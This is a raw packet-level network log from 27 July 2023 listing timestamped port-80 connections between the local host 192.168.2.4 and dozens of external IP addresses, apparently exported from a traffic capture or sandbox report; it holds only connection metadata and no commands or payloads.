                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508223057 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508228064 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508249998 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508280993 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508295059 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508328915 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508363008 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508395910 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508397102 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508414984 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508460045 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508747101 CEST8049807185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508958101 CEST4980780192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.508976936 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509016991 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509049892 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509181023 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509212017 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509275913 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509313107 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509347916 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509382963 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509397984 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509412050 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509438038 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509473085 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509499073 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509510040 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509521008 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509546041 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509560108 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509581089 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509598017 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509618044 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509633064 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509820938 CEST4980780192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.509821892 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.510229111 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.510267973 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.510303020 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.510333061 CEST8049791172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.510528088 CEST4979180192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.523531914 CEST8049797170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.547955990 CEST8049807185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.548690081 CEST8049807185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.549052000 CEST4980780192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.593374968 CEST804980560.43.154.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.593498945 CEST4980580192.168.2.460.43.154.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.614413977 CEST4980780192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.614463091 CEST4980580192.168.2.460.43.154.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.653090954 CEST8049807185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.653228045 CEST4980780192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.668893099 CEST8049797170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.668973923 CEST4979780192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.724283934 CEST8049804202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.725799084 CEST8049804202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.725888968 CEST4980480192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.771693945 CEST4977680192.168.2.4137.118.26.67
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.793962955 CEST4980480192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.796327114 CEST4980880192.168.2.434.117.168.233
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.810976028 CEST804980834.117.168.233192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.811091900 CEST4980880192.168.2.434.117.168.233
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.816057920 CEST4980880192.168.2.434.117.168.233
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.830605030 CEST804980834.117.168.233192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.844327927 CEST804980834.117.168.233192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.844434023 CEST4980880192.168.2.434.117.168.233
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.882649899 CEST4980980192.168.2.446.242.238.60
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.882725954 CEST4981080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.901801109 CEST8049810192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.901937962 CEST4981080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.902282000 CEST4981080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.905199051 CEST804980560.43.154.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.907546043 CEST804980560.43.154.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.907634974 CEST4980580192.168.2.460.43.154.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.913131952 CEST804980946.242.238.60192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.913233042 CEST4980980192.168.2.446.242.238.60
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.921062946 CEST8049810192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.921319962 CEST8049810192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.921396971 CEST4981080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.947518110 CEST4980980192.168.2.446.242.238.60
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.947724104 CEST4980580192.168.2.460.43.154.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.948524952 CEST4981180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.951256990 CEST4981080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.970540047 CEST8049810192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.970638990 CEST4981080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.974771023 CEST804975069.163.218.51192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.976370096 CEST804981182.201.61.230192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.976485014 CEST4981180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.977993965 CEST804980946.242.238.60192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.978986025 CEST804980946.242.238.60192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.979043961 CEST4980980192.168.2.446.242.238.60
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.016638041 CEST4981180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.044559956 CEST804981182.201.61.230192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.051937103 CEST804981182.201.61.230192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.052058935 CEST4981180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.077810049 CEST8049804202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.077922106 CEST4980480192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.156342030 CEST4981180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.162834883 CEST4981280192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.179455996 CEST8049812188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.179646969 CEST4981280192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.188972950 CEST4981280192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.191087961 CEST804981182.201.61.230192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.191206932 CEST4981180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.193618059 CEST4978880192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.205358028 CEST8049812188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.225244045 CEST8049788213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.225378990 CEST4978880192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.226521015 CEST8049812188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.226630926 CEST4981280192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.239336014 CEST804980560.43.154.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.239439964 CEST4980580192.168.2.460.43.154.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.276165962 CEST4978880192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.309350967 CEST8049788213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.309425116 CEST8049788213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.309462070 CEST4978880192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.309483051 CEST8049788213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.309498072 CEST4978880192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.309539080 CEST4978880192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.490185022 CEST804971569.163.239.62192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.547833920 CEST4981380192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.567331076 CEST8049813188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.568778038 CEST4981380192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.571086884 CEST4981380192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.572928905 CEST4981480192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.586059093 CEST4981580192.168.2.481.2.194.241
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.590353966 CEST8049813188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.590481997 CEST8049813188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.590604067 CEST4981380192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.610719919 CEST4981380192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.616476059 CEST8049752147.154.0.23192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.616754055 CEST4975280192.168.2.4147.154.0.23
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.620223045 CEST804981581.2.194.241192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.620382071 CEST4981580192.168.2.481.2.194.241
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.620714903 CEST4981580192.168.2.481.2.194.241
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.622428894 CEST4981680192.168.2.496.127.180.42
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.625307083 CEST4981780192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.627756119 CEST4981880192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.630090952 CEST8049813188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.630199909 CEST4981380192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.641534090 CEST8049817188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.641642094 CEST4981780192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.654761076 CEST804981581.2.194.241192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.659694910 CEST804981581.2.194.241192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.659787893 CEST4981580192.168.2.481.2.194.241
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.706361055 CEST4981780192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.712378979 CEST804981454.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.712579012 CEST4981480192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.722707987 CEST8049817188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.725378036 CEST8049818192.241.158.94192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.725528955 CEST4981880192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.738429070 CEST4981580192.168.2.481.2.194.241
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.739844084 CEST4981980192.168.2.451.79.51.72
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.764952898 CEST4981480192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.765389919 CEST4981880192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.777251959 CEST804981581.2.194.241192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.777407885 CEST4981580192.168.2.481.2.194.241
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.842149973 CEST804981951.79.51.72192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.842255116 CEST4981980192.168.2.451.79.51.72
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.852562904 CEST4981980192.168.2.451.79.51.72
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.862617016 CEST8049818192.241.158.94192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.862668991 CEST8049818192.241.158.94192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.862761974 CEST4981880192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.892292023 CEST4981880192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.905436993 CEST804981454.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.905504942 CEST804981454.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.905580044 CEST4981480192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.909924984 CEST4981480192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.928828001 CEST4982080192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.937597036 CEST8049817188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.937681913 CEST8049817188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.937777042 CEST4981780192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.938214064 CEST4981780192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.954966068 CEST804981951.79.51.72192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.955038071 CEST804981951.79.51.72192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.955133915 CEST4981980192.168.2.451.79.51.72
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.958553076 CEST4981980192.168.2.451.79.51.72
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.989671946 CEST8049818192.241.158.94192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.989989042 CEST4981880192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.990500927 CEST4982180192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.990525961 CEST4981780192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.006792068 CEST8049817188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.006850958 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.007004023 CEST4982180192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.048579931 CEST804981454.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.060837030 CEST804981951.79.51.72192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.069046974 CEST804982054.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.069230080 CEST4982080192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.119862080 CEST4982180192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.120229959 CEST4982080192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.136416912 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.142064095 CEST8049802135.181.73.98192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.142151117 CEST4980280192.168.2.4135.181.73.98
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.192208052 CEST804981182.201.61.230192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.192322969 CEST4981180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.216825008 CEST8049817188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.216850996 CEST8049817188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.217154980 CEST4981780192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.259218931 CEST804982054.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.259253979 CEST804982054.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.259347916 CEST4982080192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.259411097 CEST4982080192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.312819958 CEST4982080192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.365910053 CEST4982280192.168.2.43.140.13.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.452671051 CEST804982054.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.514935017 CEST80498223.140.13.188192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.515949011 CEST4982280192.168.2.43.140.13.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.530293941 CEST4982280192.168.2.43.140.13.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.573498964 CEST4982380192.168.2.4217.19.237.54
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.580996037 CEST4982480192.168.2.423.227.38.74
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.582654953 CEST4982580192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.596932888 CEST8049823217.19.237.54192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.597425938 CEST4982380192.168.2.4217.19.237.54
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.597603083 CEST804982423.227.38.74192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.597856045 CEST4982480192.168.2.423.227.38.74
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.597954988 CEST4982380192.168.2.4217.19.237.54
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.598171949 CEST4982480192.168.2.423.227.38.74
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.614285946 CEST804982423.227.38.74192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.621191978 CEST8049823217.19.237.54192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.623234034 CEST8049823217.19.237.54192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.623334885 CEST4982380192.168.2.4217.19.237.54
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668453932 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668524027 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668572903 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668603897 CEST4982180192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668621063 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668654919 CEST4982180192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668668032 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668720961 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668724060 CEST4982180192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668788910 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668837070 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668847084 CEST4982180192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668884993 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668896914 CEST4982180192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668935061 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.668987989 CEST4982180192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.669195890 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.669241905 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.669298887 CEST4982180192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.679271936 CEST80498223.140.13.188192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.679322958 CEST80498223.140.13.188192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.679455996 CEST4982280192.168.2.43.140.13.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.680205107 CEST4982280192.168.2.43.140.13.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.697654963 CEST4982680192.168.2.43.140.13.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.734936953 CEST4982780192.168.2.413.248.169.48
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.754543066 CEST804982713.248.169.48192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.755398035 CEST4982780192.168.2.413.248.169.48
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.755744934 CEST4982780192.168.2.413.248.169.48
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.768570900 CEST804982423.227.38.74192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.771598101 CEST4982480192.168.2.423.227.38.74
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.775154114 CEST804982713.248.169.48192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.777039051 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.777085066 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.777132034 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.777189970 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.777237892 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.777285099 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.777335882 CEST8049821172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.777345896 CEST4982180192.168.2.4172.67.201.26
